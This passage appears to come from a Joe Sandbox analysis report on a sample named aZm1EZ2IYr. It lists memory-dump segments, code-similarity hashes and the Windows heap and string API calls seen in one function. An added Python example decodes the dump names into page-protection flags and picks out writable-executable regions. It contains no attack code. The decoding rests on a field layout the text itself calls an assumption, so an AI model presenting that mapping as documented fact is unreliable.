• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22665e29cf6ede489820d0b1d9c84d6d3065c73df6a3b01cb21ac14a99b0ba52
• Instruction ID: 11abf835f4329a29c3e6586690ceaf82f6d44dd02e1a826ae9a877be94c0cc83
• Opcode Fuzzy Hash: 22665e29cf6ede489820d0b1d9c84d6d3065c73df6a3b01cb21ac14a99b0ba52
• Instruction Fuzzy Hash: 3C51C2739042159BEF19CF59C4806EA73B1EF98304F2684BED84AEF286EB705945CB50
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bf2bb6b3d05c38e4060781f12ac20013be04fbe06034238dded01c4a9a45202
• Instruction ID: 2525b3779876bc61ef8277f9a54d278989ebf689e7a4db5f1b5018e1b38aff20
• Opcode Fuzzy Hash: 5bf2bb6b3d05c38e4060781f12ac20013be04fbe06034238dded01c4a9a45202
• Instruction Fuzzy Hash: 6F210D21A74AE206C7848BFCFCD012277D5DBCD21BB5D8369CE54C90B2D36DE6A38550
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
• Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
• Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
• Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                        • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                        • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                        • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
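The dotted *.sdmp names under "Memory Dump Source" and "Associated" encode where each dumped region sat in the process and how it was mapped, but the report does not spell out the fields. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It assumes the field order process index, snapshot, dump id, base address, protection, an undecoded field, allocation type, another undecoded field, inferred only from the values matching the Win32 PAGE_* and MEM_* constants (0x02 PAGE_READONLY on the headers at 00180000, 0x80 PAGE_EXECUTE_WRITECOPY on the code at 00181000, 0x04/0x08 on the data pages, 0x1000000 MEM_IMAGE throughout); that mapping is an assumption, not something the page documents. The sample input is a constructed excerpt of the descriptors listed above, with one line repeated on purpose.

```python
"""Decode Joe Sandbox memory-dump descriptors into base address and mapping info.

ASSUMPTION (not documented on the page): the dotted *.sdmp name is
    <proc idx>.<snapshot>.<dump id>.<base address>.<protect>.<f6>.<type>.<f8>
where <protect> and <type> hold Win32 MEMORY_BASIC_INFORMATION constants.
<f6> and <f8> are kept raw because their meaning is not established here.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Win32 page-protection values (low byte), modifier bits, and region types.
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPES = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* value
WRITE_MASK = 0xCC  # READWRITE | WRITECOPY | EXECUTE_READWRITE | EXECUTE_WRITECOPY

_DESCRIPTOR = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.(?P<dump>[0-9]+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp", re.IGNORECASE)


@dataclass(frozen=True)
class DumpSegment:
    process_index: int
    snapshot: int
    dump_id: int
    base: int
    protect: int
    mem_type: int
    raw_f6: int
    raw_f8: int

    @property
    def protection_name(self) -> str:
        low = self.protect & 0xFF
        name = PAGE_PROTECTION.get(low, f"0x{low:02x}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([name, *mods])

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_segment(name: str) -> DumpSegment:
    """Parse one descriptor (the name may carry trailing text such as ', Offset: ...')."""
    m = _DESCRIPTOR.search(name)
    if m is None:
        raise ValueError(f"not a dump descriptor: {name!r}")
    return DumpSegment(process_index=int(m["proc"], 16), snapshot=int(m["snap"], 16),
                       dump_id=int(m["dump"]), base=int(m["base"], 16),
                       protect=int(m["prot"], 16), mem_type=int(m["type"], 16),
                       raw_f6=int(m["f6"], 16), raw_f8=int(m["f8"], 16))


def parse_report_lines(text: str) -> list[DumpSegment]:
    """Pull every descriptor out of pasted report text, de-duplicated in order."""
    found = [parse_segment(m.group(0)) for m in _DESCRIPTOR.finditer(text)]
    return list(dict.fromkeys(found))


def writable_executable(segments: list[DumpSegment]) -> list[DumpSegment]:
    """Regions mapped both executable and writable, i.e. code that can be patched in place."""
    return [s for s in segments if s.executable and s.writable]


# Constructed excerpt of the descriptors on this page; the repeated 00180000 line
# is deliberate so the de-duplication is exercised.
SAMPLE_REPORT_LINES = """
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    for seg in parse_report_lines(SAMPLE_REPORT_LINES):
        flag = "  <-- W+X" if seg.executable and seg.writable else ""
        print(f"{seg.base:#010x}  {seg.protection_name:<24} {seg.type_name}{flag}")
```

Under these assumptions the source dump at 00181000, the page right after the image headers at 00180000, decodes to PAGE_EXECUTE_WRITECOPY: that is the protection Windows gives an image section flagged both executable and writable, so the code of this sample can be modified in place, which is worth keeping in mind when comparing the disassembled functions against the on-disk file.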
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches: (none listed)
Similarity
• API ID: (not populated)
• String ID: (not populated)
• API String ID: (not populated)
• Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
• Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
• Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
• Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: the same 22 dump segments (00180000 through 003F0000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches: (none listed)
Similarity
• API ID: (not populated)
• String ID: (not populated)
• API String ID: (not populated)
• Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
• Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
• Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
• Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
• Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
• Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
• Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
APIs
  • Part of subcall function 0018DB54: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0018DB90
  • Part of subcall function 0018DB54: strchr.MSVCRT ref: 0018DBA2
• GetProcessHeap.KERNEL32(00000008,?,75AA5460,?,00000000), ref: 0018DCD9
• HeapAlloc.KERNEL32(00000000), ref: 0018DCE0
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DCF5
• HeapFree.KERNEL32(00000000), ref: 0018DCFC
• strcpy_s.MSVCRT ref: 0018DD18
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DD2A
• HeapFree.KERNEL32(00000000), ref: 0018DD37
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DD68
• HeapFree.KERNEL32(00000000), ref: 0018DD6F
• GetProcessHeap.KERNEL32(00000008,?), ref: 0018DD76
• HeapAlloc.KERNEL32(00000000), ref: 0018DD7D
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DD92
• HeapFree.KERNEL32(00000000), ref: 0018DD99
• strcpy_s.MSVCRT ref: 0018DDAF
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DDC1
• HeapFree.KERNEL32(00000000), ref: 0018DDC8
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DDE6
• HeapFree.KERNEL32(00000000), ref: 0018DDED
• GetProcessHeap.KERNEL32(00000008,?), ref: 0018DDF4
• HeapAlloc.KERNEL32(00000000), ref: 0018DDFB
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE10
• HeapFree.KERNEL32(00000000), ref: 0018DE17
• strcpy_s.MSVCRT ref: 0018DE27
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE39
• HeapFree.KERNEL32(00000000), ref: 0018DE40
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DE68
• HeapFree.KERNEL32(00000000), ref: 0018DE6F
• GetProcessHeap.KERNEL32(00000008,?), ref: 0018DE76
• HeapAlloc.KERNEL32(00000000), ref: 0018DE7D
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE98
• HeapFree.KERNEL32(00000000), ref: 0018DE9F
• strcpy_s.MSVCRT ref: 0018DEB2
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DEC4
• HeapFree.KERNEL32(00000000), ref: 0018DECB
• lstrlenA.KERNEL32(00000000), ref: 0018DED4
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 0018DEEA
• HeapAlloc.KERNEL32(00000000), ref: 0018DEF1
• lstrlenA.KERNEL32(00000000), ref: 0018DF09
  • Part of subcall function 0018F0FD: std::_Xinvalid_argument.LIBCPMT ref: 0018F113
• strcpy_s.MSVCRT ref: 0018DF4A
• GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0018DF70
• HeapFree.KERNEL32(00000000), ref: 0018DF7D
• lstrlenA.KERNEL32(?), ref: 0018DF82
• GetProcessHeap.KERNEL32(00000008,00000001), ref: 0018DF91
• HeapAlloc.KERNEL32(00000000), ref: 0018DF98
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DFAC
• HeapFree.KERNEL32(00000000), ref: 0018DFB3
• strcpy_s.MSVCRT ref: 0018DFC1
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018DFCE
• HeapFree.KERNEL32(00000000), ref: 0018DFD5
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018E00A
• HeapFree.KERNEL32(00000000), ref: 0018E011
• GetProcessHeap.KERNEL32(00000008,?), ref: 0018E018
• HeapAlloc.KERNEL32(00000000), ref: 0018E01F
• strcpy_s.MSVCRT ref: 0018E03A
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018E04C
• HeapFree.KERNEL32(00000000), ref: 0018E053
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018E0F7
• HeapFree.KERNEL32(00000000), ref: 0018E0FE
• GetProcessHeap.KERNEL32(00000000,?), ref: 0018E148
• HeapFree.KERNEL32(00000000), ref: 0018E14F
  • Part of subcall function 0018DB54: strchr.MSVCRT ref: 0018DBC7
  • Part of subcall function 0018DB54: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBE9
  • Part of subcall function 0018DB54: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018DBF6
  • Part of subcall function 0018DB54: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBFD
  • Part of subcall function 0018DB54: strcpy_s.MSVCRT ref: 0018DC44
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
